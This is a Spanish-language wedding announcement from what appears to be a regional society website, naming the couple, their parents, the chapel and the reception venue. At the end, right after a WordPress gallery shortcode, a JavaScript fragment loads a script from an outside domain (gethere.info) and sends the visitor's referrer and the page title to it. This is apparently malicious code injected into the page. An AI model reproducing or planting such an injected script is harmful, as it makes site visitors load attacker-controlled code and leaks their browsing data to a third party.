Boda de Synthia & Luis

Protagonizando una nueva etapa como marido y mujer

Fotos Alejandro Rodriguez

 

Se encuentran Synthia Karina Gomez Carrizales y su ahora esposo Luis Fernando Sanchez Sanchez, quienes convencidos de su amor decidieron unirse recientemente en sagrado matrimonio.

La Capilla de Santo Cristo, fue el ecenario que los recibió el pasado 10 de septiembre ante la presencia de sus padres: Pedro Gomez Castillo y Reyna Carrizales Dominguez; Juana Maria Sanchez Valero y José Luis Sanchez Martínez, quienes felices por su decisión les desearon lo mejor. Emocionados por cristalizar uno de sus más grandes sueños, la pareja recibió las mas sinceras felicitaciones por sus enlace matrimonial, del cual fueron testigos familiares y amigos, que compartieron su alegría y no dejaron de acompañarlos. Synthia y Luis disfrutaron la emotiva celebración durante una espectacular recepción en El Museo del Desierto, en la que rodeados de cariño brindaron por su eterno amor así también por esta nueva historia que ya disfrutan al máximo y la cual seguramente estará llena de bendiciones. ¡Felicidades!

[Best_Wordpress_Gallery id=”62″ gal_title=”Boda de Synthia y Luis”]s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

No hay comentarios

Dejar un comentario

Su correo electrónico no será revelado